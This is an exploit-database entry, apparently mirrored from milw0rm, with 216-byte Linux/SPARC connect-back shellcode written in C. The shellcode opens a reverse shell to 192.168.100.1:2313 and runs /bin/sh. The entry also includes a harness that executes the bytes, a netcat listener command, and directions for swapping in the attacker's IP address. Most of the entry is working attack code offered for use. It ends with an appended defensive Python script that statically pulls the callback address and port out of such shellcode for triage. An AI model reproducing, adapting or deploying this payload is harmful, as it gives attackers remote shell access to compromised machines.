Linux/SPARC – Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)
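Vulnerability ID | 1054668 | Vulnerability type | |
Published | 2004-09-26 | Updated | 2004-09-26 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux_SPARC | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit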
/* linux (sparc) connect back shellcode, because someone had to evade those firewalls. *sigh* */
/*
* OS : Linux
* Architecture : Sparc
* Type : Connect Back
* Length : 216 Bytes
* Listen-Port : 2313/TCP
* Default IP : 192.168.100.1 ( see how you'll change it at the end. )
*
* null bytes (0x00), breaks (0x0a), nops, fork(), ... avoided.
* was tested accordingly, couldn't be optimized more.
* plug it in your code, launch nc -l -vvv -p 2313 and wait for it.
*
* (c) 2002 killah @ hack . gr
* All rights reserved.
*
*/
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <string.h>  /* strlen */

#define NAME "Linux Sparc Connect-Back"
char cb_linux_sparc[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10"; // ta 0x10
int
main()
{
    int (*test)();
    // treat the byte array as a function
    test = (int (*)()) cb_linux_sparc;
    // strlen() reports the full length only because the code has no null bytes
    printf("%s shellcode\n\tSize = %d\n",NAME,(int)strlen(cb_linux_sparc));
    (int)(*test)();
    exit(0);
}
/*******************************************************************************
here it is the C code, that will give you the IPv4 Address of your
box, in a big-endianess style, so to replace it inside shellcode and
get the whole thing working for you.
example:
int main() { printf(" 0x%02x%02x%02x%02x\n",192,168,100,1); exit(0); }
or @ bash printf "0x%02x%02x%02x%02x\n" 192 168 100 1
i believe no further explanation needed.
********************************************************************************/
//EOF
// milw0rm.com [2004-09-26]
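When triaging a captured sample, the connect-back endpoint can be read statically from the `sethi`/`or`/`st`/`sth` words that fill `sockaddr_in` in the listing above. The Python sketch below is an added example, not part of the original listing. The name `extract_sockaddr` and the simplified register tracking (no register windows; only `sethi`, `or` with an immediate, `st` and `sth` are modelled) are assumptions of this example.

```python
import ipaddress
import struct

# Constructed sample: the first eight instruction words of the listing above
# (the part that fills struct sockaddr_in on the stack), big-endian.
SAMPLE = bytes.fromhex(
    "9de3bf80" "90102002" "d037bfe0" "90102909"
    "d037bfe2" "13302a19" "90126001" "d027bfe4"
)
OP3_OR, OP3_ST, OP3_STH, AF_INET = 0x02, 0x04, 0x06, 2


def simm13(word):
    """Sign-extend the 13-bit immediate of a format-3 instruction."""
    v = word & 0x1FFF
    return v - 0x2000 if v & 0x1000 else v


def extract_sockaddr(code):
    """Return (ip, port) stored as an AF_INET sockaddr_in, or None."""
    regs = {0: 0}  # register number -> known constant; %g0 reads as zero
    stores = {}    # (base register, offset) -> (width in bytes, value)
    for (word,) in struct.iter_unpack(">I", code[: len(code) & ~3]):
        op, rd = word >> 30, (word >> 25) & 0x1F
        op3, rs1, ibit = (word >> 19) & 0x3F, (word >> 14) & 0x1F, word & 0x2000
        if op == 0 and ((word >> 22) & 7) == 4:  # sethi %hi(x), rd
            regs[rd] = (word & 0x3FFFFF) << 10
        elif op == 2 and op3 == OP3_OR and ibit and rs1 in regs:  # or rs1, imm, rd
            regs[rd] = (regs[rs1] | simm13(word)) & 0xFFFFFFFF
        elif op == 3 and op3 in (OP3_ST, OP3_STH) and ibit:  # st/sth rd, [rs1 + imm]
            width = 2 if op3 == OP3_STH else 4
            key = (rs1, simm13(word))
            if rd in regs:
                stores[key] = (width, regs[rd] & ((1 << 8 * width) - 1))
            else:
                stores.pop(key, None)  # overwritten with an unknown value
        elif op == 2 or (op == 3 and (op3 & 4) == 0):
            regs.pop(rd, None)  # other ALU ops and plain loads make rd unknown
        regs[0] = 0
    for (base, off), (width, val) in stores.items():
        port = stores.get((base, off + 2), (0, 0))
        addr = stores.get((base, off + 4), (0, 0))
        if (width, val) == (2, AF_INET) and port[0] == 2 and addr[0] == 4:
            return str(ipaddress.IPv4Address(addr[1])), port[1]
    return None


if __name__ == "__main__":
    print(extract_sockaddr(SAMPLE))
```

The recovered address and port can go directly into egress firewall or NetFlow searches for hosts that attempted the outbound connection.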